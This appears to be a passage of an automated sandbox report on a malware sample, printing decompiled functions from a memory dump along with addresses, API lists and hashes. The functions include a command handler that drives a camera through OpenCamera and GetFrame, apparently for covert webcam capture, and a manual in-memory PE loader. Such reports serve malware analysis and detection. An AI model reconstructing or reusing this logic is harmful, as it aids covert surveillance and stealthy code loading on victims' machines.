						E004020EC(_t78, _t145, _t120, __eflags,  &_v60);
						E00417478( &_v76, _t120);
						_t146 = _t145 + 0x30;
						_t131 =  *_t30 - 0x3c;
						__eflags = _t131;
						if(__eflags == 0) {
							L00401E49( &_v52, _t120, __eflags, 0);
							_t38 = E00402489();
							L00401F95(L00401E49( &_v56, _t120, __eflags, 0));
							_t120 = _t38;
							_t133 = E0040F69B();
							__eflags = _t133;
							if(_t133 != 0) {
								 *0x46bac4 = E0040F931(_t133, "OpenCamera");
								 *0x46bac0 = E0040F931(_t133, "CloseCamera");
								_t48 = E0040F931(_t133, "GetFrame");
								_t120 = "FreeFrame";
								 *0x46bac8 = _t48;
								 *0x46babc = E0040F931(_t133, "FreeFrame");
								 *0x46baaa = 1;
								E004020EC(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t134 = _t131 - 1;
							__eflags = _t134;
							if(_t134 == 0) {
								__eflags =  *0x46ba77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t135 = _t134 - 1;
								__eflags = _t135;
								if(_t135 == 0) {
									 *0x46bac0();
									 *0x46ba77 = 0;
								} else {
									_t136 = _t135 - 1;
									__eflags = _t136;
									if(_t136 == 0) {
										_t57 =  *0x46bac4();
										 *0x46ba77 = _t57;
										__eflags = _t57;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t120 = E00436769(_t52, L00401F95(L00401E49( &_v52, _t120, __eflags, 0)));
											E0040471E(_a4, _t54, __eflags);
										}
									} else {
										_t137 = _t136 - 1;
										__eflags = _t137;
										if(_t137 == 0) {
											_t59 =  *0x46bac4();
											 *0x46ba77 = _t59;
											__eflags = _t59;
											if(__eflags == 0) {
												L15:
												E004020EC(_t78, _t146 - 0x18, _t120, __eflags, 0x46c1b8);
												_push(0x41);
												L23:
												E00404AA4(_t78, _a4, _t120, __eflags);
											} else {
												_t62 = E00436769(_t60, L00401F95(L00401E49( &_v52, _t120, __eflags, _t137)));
												 *_t146 = 0x3e8;
												Sleep(??);
												_t120 = _t62;
												E0040471E(_a4, _t62, __eflags);
												 *0x46bac0();
											}
										}
									}
								}
							}
						}
						L00401E74( &_v52, _t120);
						E00401FC7();
						E00401FC7();
						__eflags = 0;
						return 0;
					} else {
						_t65 =  &(_t120[_t78]);
						_a12 =  &(_t120[_t78]);
						__eflags = _t78;
						if(__eflags != 0) {
							_push(0);
							_t67 = E00402815(_t78, _t129, _t120, _t125, __eflags, _t65);
							__eflags = _t67;
							if(_t67 != 0) {
								_push( *_a8);
								_t69 = E00402229(_t129);
								E0040159F(E00402229(_t129) + _t78 * 2, _t69);
								_push(_t78);
								E0040158B(E00402229(_t129), _t125);
								E00402888(_a12);
							}
						}
						_t66 = _t129;
						goto L7;
					}
				} else {
					_t66 = E004035BF(__ebx, _t129, __edx, _t125 - E00402229(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E00402229(_t81) >> 1, _a12);
					L7:
					return _t66;
				}
			}

0x0040448a
0x0040448b
0x0040448e
0x00404491
0x00404496
0x00404498
0x0040449a
0x004044b4
0x004044b7
0x004044be
0x004044c3
0x004044c6
0x004044c9
0x004044cf
0x004044d1
0x00404532
0x00404537
0x00404544
0x00404545
0x00404558
0x0040455d
0x00404567
0x0040456c
0x00404576
0x0040457f
0x00404584
0x00404587
0x00404587
0x0040458a
0x0040466a
0x00404671
0x00404685
0x0040468a
0x00404693
0x00404695
0x00404697
0x004046aa
0x004046bb
0x004046c2
0x004046c7
0x004046cc
0x004046db
0x004046e2
0x004046ee
0x004046f3
0x00000000
0x004046f3
0x00404590
0x00404590
0x00404590
0x00404593
0x0040462f
0x00404636
0x00000000
0x00000000
0x00404599
0x00404599
0x00404599
0x0040459c
0x0040461d
0x00404623
0x0040459e
0x0040459e
0x0040459e
0x004045a1
0x0040460c
0x00404612
0x00404617
0x00404619
0x00000000
0x0040461b
0x0040463c
0x00404658
0x0040465a
0x0040465a
0x004045a3
0x004045a3
0x004045a3
0x004045a6
0x004045ac
0x004045b2
0x004045b7
0x004045b9
0x004045f6
0x00404600
0x00404605
0x004046f5
0x004046f8
0x004045bb
0x004045cd
0x004045d4
0x004045db
0x004045e4
0x004045e6
0x004045eb
0x004045eb
0x004045b9
0x004045a6
0x004045a1
0x0040459c
0x00404593
0x00404701
0x0040470a
0x00404712
0x00404717
0x0040471d
0x004044d3
0x004044d3
0x004044d6
0x004044d9
0x004044db
0x004044dd
0x004044e2
0x004044e7
0x004044e9
0x004044f0
0x004044f2
0x00404503
0x0040450d
0x00404515
0x00404522
0x00404522
0x004044e9
0x00404527
0x00000000
0x00404529
0x0040449c
0x004044ad
0x0040452a
0x0040452d
0x0040452d

APIs

Part of subcall function 004028D8: std::_Xinvalid_argument.LIBCPMT ref: 004028DD

Sleep.KERNEL32(00000000,?), ref: 004045DB

Part of subcall function 0040471E: __EH_prolog.LIBCMT ref: 00404723

Strings

FreeFrame, xrefs: 004046C7
CloseCamera, xrefs: 004046A5
GetFrame, xrefs: 004046B6
OpenCamera, xrefs: 00404699

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 834325642-3547787478
Opcode ID: 9f95b5734df59e391d0ca30a0dbebe00e36f8db35eb61ae523649e3ecf460818
Instruction ID: 36a5e228549547fe3264f4e150403a2e0a3e3e2746ad4685d8a770f54e79c9b4
Opcode Fuzzy Hash: 9f95b5734df59e391d0ca30a0dbebe00e36f8db35eb61ae523649e3ecf460818
Instruction Fuzzy Hash: 6651E4B1604200ABCA05BB769D0A66E3B559BC5308F00443FF905BB7E2EF7D8945879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6A7, Relevance: 7.7, APIs: 5, Instructions: 206
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040F6A7(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v52;
				char _v56;
				signed int _t59;
				signed int _t61;
				void* _t64;
				void* _t67;
				signed int _t72;
				void* _t78;
				signed int _t79;
				void* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				void* _t92;
				signed int _t93;
				intOrPtr* _t96;
				signed int _t98;
				signed int _t113;
				void* _t115;
				signed int _t118;
				void* _t124;
				signed int _t126;
				intOrPtr _t128;
				signed int _t129;
				void* _t130;
				signed int _t131;
				void* _t132;
				void* _t133;

				_t115 = 0x40;
				_v16 = __edx;
				_v8 = __ecx;
				_t124 = 0;
				if(E0040F14A(__edx, _t115) == 0) {
					L33:
					return 0;
				}
				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
					_t59 = E0040F14A(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
					__eflags = _t59;
					if(_t59 == 0) {
						goto L33;
					}
					_t96 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					__eflags =  *_t96 - 0x4550;
					if( *_t96 != 0x4550) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t96 + 4)) - 0x14c;
					if( *((intOrPtr*)(_t96 + 4)) != 0x14c) {
						goto L2;
					}
					__eflags =  *(_t96 + 0x38) & 0x00000001;
					if(( *(_t96 + 0x38) & 0x00000001) != 0) {
						goto L2;
					}
					_t118 =  *(_t96 + 6) & 0x0000ffff;
					_t61 =  *(_t96 + 0x14) & 0x0000ffff;
					__eflags = _t118;
					if(_t118 == 0) {
						L14:
						__imp__GetNativeSystemInfo( &_v56);
						_t128 = E0040F139( *((intOrPtr*)(_t96 + 0x50)), _v52);
						_v20 = _t128;
						_t64 = E0040F139(_t124, _v52);
						__eflags = _t128 - _t64;
						if(_t128 != _t64) {
							goto L2;
						}
						_push(0);
						_t129 = E0040F643( *((intOrPtr*)(_t96 + 0x34)), _t128, 0x3000, 4);
						_t133 = _t132 + 0x14;
						_v12 = _t129;
						__eflags = _t129;
						if(_t129 != 0) {
							L18:
							_t67 = HeapAlloc(GetProcessHeap(), 8, 0x40);
							_t126 = _t67;
							__eflags = _t126;
							if(_t126 != 0) {
								 *(_t126 + 4) = _t129;
								 *(_t126 + 0x34) =  *(_t126 + 0x34) & 0x00000000;
								 *((intOrPtr*)(_t126 + 0x1c)) = E0040F643;
								 *(_t126 + 0x14) = ( *(_t96 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t126 + 0x20)) = E0040F65A;
								 *((intOrPtr*)(_t126 + 0x24)) = E0040F66E;
								 *((intOrPtr*)(_t126 + 0x28)) = E0040F67C;
								 *((intOrPtr*)(_t126 + 0x2c)) = E0040F68D;
								 *((intOrPtr*)(_t126 + 0x3c)) = _v52;
								_t72 = E0040F14A(_v16,  *((intOrPtr*)(_t96 + 0x54)));
								__eflags = _t72;
								if(_t72 == 0) {
									L32:
									E0040FA47(_t126);
									goto L33;
								}
								_push(0);
								_t130 = E0040F643(_t129,  *((intOrPtr*)(_t96 + 0x54)), 0x1000, 4);
								E004324E0(_t130, _v8,  *((intOrPtr*)(_t96 + 0x54)));
								_t43 = _v8 + 0x3c; // 0x4530cc
								_t78 =  *_t43 + _t130;
								_t131 = _v12;
								 *_t126 = _t78;
								 *((intOrPtr*)(_t78 + 0x34)) = _t131;
								_t79 = E0040F15D(_v8, _v16, _t96, _t126);
								__eflags = _t79;
								if(_t79 == 0) {
									goto L32;
								}
								_t80 =  *_t126;
								_t123 =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
								__eflags =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
								if( *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34))) {
									_t98 = 1;
									__eflags = 1;
									 *((intOrPtr*)(_t126 + 0x18)) = 1;
								} else {
									 *((intOrPtr*)(_t126 + 0x18)) = E0040F459(_t126, _t123);
									_t98 = 1;
								}
								__eflags = E0040F4FE(_t126);
								if(__eflags != 0) {
									_t82 = E0040F304(_t126, __eflags);
									__eflags = _t82;
									if(_t82 == 0) {
										goto L32;
									}
									_t83 = E0040F428(_t126);
									__eflags = _t83;
									if(_t83 == 0) {
										goto L32;
									}
									_t85 =  *( *_t126 + 0x28);
									__eflags = _t85;
									if(_t85 == 0) {
										_t54 = _t126 + 0x38;
										 *_t54 =  *(_t126 + 0x38) & 0x00000000;
										__eflags =  *_t54;
										L38:
										return _t126;
									}
									_t87 = _t85 + _t131;
									__eflags =  *(_t126 + 0x14);
									if( *(_t126 + 0x14) == 0) {
										 *(_t126 + 0x38) = _t87;
										goto L38;
									}
									_t88 =  *_t87(_t131, _t98, 0);
									__eflags = _t88;
									if(_t88 != 0) {
										 *((intOrPtr*)(_t126 + 0x10)) = _t98;
										goto L38;
									}
									SetLastError(0x45a);
								}
								goto L32;
							}
							_push(_t67);
							E0040F65A(_t129, _t67, 0x8000);
							L17:
							_push(0xe);
							L3:
							SetLastError();
							goto L33;
						}
						_push(0);
						_t91 = E0040F643(0, _v20, 0x3000, 4);
						_t129 = _t91;
						_v12 = _t91;
						_t133 = _t133 + 0x14;
						__eflags = _t129;
						if(_t129 != 0) {
							goto L18;
						}
						goto L17;
					}
					_t113 = _t96 + 0x24 + _t61;
					__eflags = _t113;
					do {
						__eflags =  *(_t113 + 4);
						_t92 =  *_t113;
						if( *(_t113 + 4) != 0) {
							_t93 = _t92 +  *(_t113 + 4);
							__eflags = _t93;
						} else {
							_t93 = _t92 +  *(_t96 + 0x38);
						}
						__eflags = _t93 - _t124;
						_t124 =  >  ? _t93 : _t124;
						_t113 = _t113 + 0x28;
						_t118 = _t118 - 1;
						__eflags = _t118;
					} while (_t118 != 0);
					goto L14;
				}
				L2:
				_push(0xc1);
				goto L3;
			}

0x0040f6b6
0x0040f6b9
0x0040f6bc
0x0040f6bf
0x0040f6c8
0x0040f8e2
0x00000000
0x0040f8e2
0x0040f6d6
0x0040f6f3
0x0040f6f8
0x0040f6fa
0x00000000
0x00000000
0x0040f703
0x0040f705
0x0040f70b
0x00000000
0x00000000
0x0040f712
0x0040f716
0x00000000
0x00000000
0x0040f718
0x0040f71c
0x00000000
0x00000000
0x0040f71e
0x0040f722
0x0040f726
0x0040f728
0x0040f74c
0x0040f750
0x0040f761
0x0040f765
0x0040f768
0x0040f76d
0x0040f76f
0x00000000
0x00000000
0x0040f777
0x0040f788
0x0040f78a
0x0040f78d
0x0040f790
0x0040f792
0x0040f7b8
0x0040f7c3
0x0040f7c9
0x0040f7cb
0x0040f7cd
0x0040f7e4
0x0040f7eb
0x0040f7f5
0x0040f7fc
0x0040f7ff
0x0040f806
0x0040f80d
0x0040f814
0x0040f81e
0x0040f824
0x0040f829
0x0040f82b
0x0040f8db
0x0040f8dd
0x00000000
0x0040f8dd
0x0040f831
0x0040f846
0x0040f84c
0x0040f85b
0x0040f85e
0x0040f860
0x0040f863
0x0040f866
0x0040f869
0x0040f871
0x0040f873
0x00000000
0x00000000
0x0040f875
0x0040f87a
0x0040f87a
0x0040f87d
0x0040f890
0x0040f890
0x0040f891
0x0040f87f
0x0040f888
0x0040f88b
0x0040f88b
0x0040f89b
0x0040f89d
0x0040f8a1
0x0040f8a6
0x0040f8a8
0x00000000
0x00000000
0x0040f8ac
0x0040f8b1
0x0040f8b3
0x00000000
0x00000000
0x0040f8b7
0x0040f8ba
0x0040f8bc
0x0040f8f5
0x0040f8f5
0x0040f8f5
0x0040f8f9
0x00000000
0x0040f8f9
0x0040f8be
0x0040f8c0
0x0040f8c4
0x0040f8f0
0x00000000
0x0040f8f0
0x0040f8ca
0x0040f8cc
0x0040f8ce
0x0040f8eb
0x00000000
0x0040f8eb
0x0040f8d5
0x0040f8d5
0x00000000
0x0040f89d
0x0040f7cf
0x0040f7d7
0x0040f7b1
0x0040f7b1
0x0040f6dd
0x0040f6dd
0x00000000
0x0040f6dd
0x0040f794
0x0040f7a0
0x0040f7a5
0x0040f7a7
0x0040f7aa
0x0040f7ad
0x0040f7af
0x00000000
0x00000000
0x00000000
0x0040f7af
0x0040f72d
0x0040f72d
0x0040f72f
0x0040f72f
0x0040f733
0x0040f735
0x0040f73c
0x0040f73c
0x0040f737
0x0040f737
0x0040f737
0x0040f73f
0x0040f741
0x0040f744
0x0040f747
0x0040f747
0x0040f747
0x00000000
0x0040f72f
0x0040f6d8
0x0040f6d8
0x00000000

APIs

Part of subcall function 0040F14A: SetLastError.KERNEL32(0000000D,0040F6C6,00000000,00000000,0040AF7B), ref: 0040F150

SetLastError.KERNEL32(000000C1,00000000,00000000,0040AF7B), ref: 0040F6DD
GetNativeSystemInfo.KERNEL32(?,00000000,00000000,0040AF7B), ref: 0040F750
GetProcessHeap.KERNEL32(00000008,00000040), ref: 0040F7BC
HeapAlloc.KERNEL32(00000000), ref: 0040F7C3
SetLastError.KERNEL32(0000045A), ref: 0040F8D5

Part of subcall function 0040F65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,0040F7DC,00000000,00000000,00008000,00000000), ref: 0040F666

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
String ID:
API String ID: 486403682-0
Opcode ID: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction ID: 31fca79699fb41a21c899f6cb63a77230b732fc93c9d9a7c568002a0e8237c26
Opcode Fuzzy Hash: eb120fceeea753676480937062db3c536b07788e457956489b4c9a7f2f50d659
Instruction Fuzzy Hash: 66610771A00201ABCB30AF65CC81B6A77A5BF44744F14403AE804BBBC1D77CED4ADB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043E550, Relevance: 7.7, APIs: 5, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0043E550(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0043F98C(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43dd4f
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x457498);
					_push( *0x457354);
					E0043E48F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x457354;
					while(1) {
						L2:
						_t244 = E00448207(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x457498);
							_push( *_t370);
							E0043E48F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x457384) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E004401F5(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											E004401F5( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E004401F5( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E004401F5( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E004401F5( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043698A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46a00c; // 0x1e1e4200
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043E550(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E0043E118(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43dd3f
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E00449367(_t444, 0x457490);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x457354;
													_v460 = 1;
													do {
														_t266 = E0044932D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x457384;
													} while (_t362 <= 0x457384);
													_t359 = _v472 + 2;
													_t267 = E004492DD(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E00448349(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043698A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46a00c; // 0x1e1e4200
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = L00441CE2(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E0043E118(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0043F98C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb94f
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E004415D4(_t286 + 4, _v728,  &_v280);
